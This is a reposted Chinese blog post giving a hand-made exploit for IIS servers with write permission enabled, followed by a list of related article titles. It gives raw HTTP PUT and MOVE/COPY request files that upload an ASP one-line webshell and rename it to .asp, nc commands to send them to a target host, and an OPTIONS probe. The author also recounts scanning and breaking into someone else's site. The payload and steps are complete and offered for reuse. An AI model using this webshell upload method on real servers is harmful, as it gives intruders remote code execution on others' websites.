IIS写权限漏洞原理利用工具手动版
很老的东西了,严格的说不是漏洞,只是设置不善造成的Bug。八百年遇不到一会,结果前几天不幸碰上了。
用JSKY扫描人家的站,结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧,我猜JSKY用的参数一定是“/”)。
还好,最后搞进去把人家的站恢复了,真惊险。还义务帮他补漏洞,删后门......
其中用到了IIS写权限利用工具,桂林老兵版的没带身上,网上下到了zwell版的,结果没成功,最后自己动手写了一个手动版的,看来还是“自己动手,丰衣足食”哇,呼呼。
分别保存下面两个TXT文件。
//PUT.TXT
PUT /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Content-Length: 24
<%Execute request(’#’)%>
//MOVE.TXT
MOVE /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Destination: http://www.xxx.com/zerosoul.asp
(别忘了上面有两下回车)
然后在CMD分别输入以下命令即可:
c:\>nc www.xxx.com 80<PUT.TXT
c:\>nc www.xxx.com 80<MOVE.TXT
然后就得到了地址为http://www.xxx.com/zerosoul.asp的一句话。
通过上面文本的内容,我们可以轻易看出IIS写权限是怎么利用的:
1.使用PUT方式上传后缀名为TXT的一句话马(不能直接上传IIS能解析的文件)。
2.使用MOVE方式把后缀改成ASP(这里用COPY也是可以的哈)。
这个手动版的利用工具虽然不能有已经做好的EXE工具那么傻瓜,但我觉得使用它的时候我们能自己控制所有内容,而且能轻易的理解这个bug利用的原理,然后即使在下不到工具的场合,我们也可以自己轻易写一个出来,呵呵。
网上都说只要打开IIS的“写入”就能利用,但是我在2003虚拟机里面一直没测试成功,在XP的IIS5里面测试成功PUT,但MOVE不成功,文件夹权限我都设置的everyone完全控制了,所以应该还有其他地方的原因。
一些补充
//OPTIONS.TXT 可以查看服务器支持哪些Method
OPTIONS / HTTP/1.1
HOST: www.xxx.com
//COPY.TXT MOVE不行可以用这个试试
COPY /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Destination: http://www.xxx.com/zerosoul.asp
转载于:https://blog.51cto.com/obnus/486411
IIS写权限漏洞原理利用工具手动版相关推荐
- IIS写权限漏洞和XFF刷票原理
IIS写权限漏洞 PUT写入漏洞 此漏洞主要是因为服务器开启了webdav的组件导致的 1.扫描漏洞,yes,可以PUT: 2.用老兵的工具上传一句话文件test.txt,然后move改名为shell ...
- Iis写权限漏洞认识 2010-10-13 10:47:20
Iis写权限漏洞认识 2010-10-13 10:47:20 标签:休闲 iis写权限 职场 http://ynhu33.blog.51cto.com/412835/405064 原创作品,允许转载, ...
- IIS写权限漏洞 (HTTP PUT方法利用)
该漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav ...
- IIS写权限漏洞————HTTP PUT 方法利用
该漏洞的产生原因来源于服务器配置不当造成, 利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webda ...
- IIS写权限利用续以及写权限漏洞来由解释
很多人也许觉得IIS PUT这玩意不值一提啊-其实不然,身在乙方,给客户做安服的时候总是遇到IIS写权限的问题,一方面WVS7.0已经可以扫描并且使用POC成功写入漏洞目标,另一方面无聊的土耳其或者印 ...
- [导入]对iis写权限的利用
对iis写权限的利用 文章来源:http://blog.csdn.net/21aspnet/archive/2004/11/04/167374.aspx 转载于:https://www.cnblogs ...
- 对iis写权限的利用
作者:未知 请作者速与本人联系 大家可能看过<远程分析IIS设置>,里面对iis的各种设置进行了分析,我这里就对iis的写权限来分析下,以下引用<远程分析IIS设置>文章对i ...
- 【愚公系列】2023年05月 网络安全高级班 071.WEB渗透与安全(文件包含漏洞原理利用防御)
文章目录 前言 一.文件包含漏洞原理利用防御 1.原理 1.1 简介 1.2 分类 1.3 代码 1.3.1 shell语句 1.3.2 包含语句 2.渗透 2.1 低安全级别 2.1.1 本地文件包 ...
- 靶机记录(十三):SickOs1.2 - IIS 中 PUT 漏洞的利用
目录 环境 主机发现 端口扫描 漏洞挖掘 GetShell 法一 法二 法三 提权 chkrootkit 漏洞提权 法一 法二 法三 防火墙规则 清痕迹,留后门 环境 链接:https ...
最新文章
- PlantCom:基于内参的宿主相关丰度定量分析揭示植物根系微生物组的微生物总量变化
- 山大计算机上机复试题目,2010年计算机复试上机 回忆
- Visual Studio Online,带来四种开发模式,未来已来。
- linux控制器错误码,ubuntu – 不频繁的输入/输出错误 – Linux服务器
- 电缆沟巡查机器人_电缆沟道巡检机器人的制作方法
- html菜单wodpress,wordpress进阶教程(二十二):初步了解菜单
- JavaScript---去除字符串中的空格(五种方式,总有一种适合你)
- 开发者需要的 9 款代码比较工具
- halcon 中的select_obj使用
- 计算机模拟自由落体,CSS3 方块自由落体运动模拟
- 服务器信号满格网速很慢,信号满格网速太慢是什么原因
- 六度分离 弗洛伊德算法
- AidLearning0.87F3安装Python3.8
- 你PICK的球队可能没赢,但PICK以下拍摄技巧绝对稳赚不赔!
- memset,calloc的区别
- matlab 替换字符 数字,使用正则表达式替换文本
- UTM的XY坐标转换为WGS84经纬度坐标
- Flutter实现天气查询App
- ldpc译码讲解_LDPC码及其译码实现
- 生信软件 | STAR(测序序列与参考序列比对)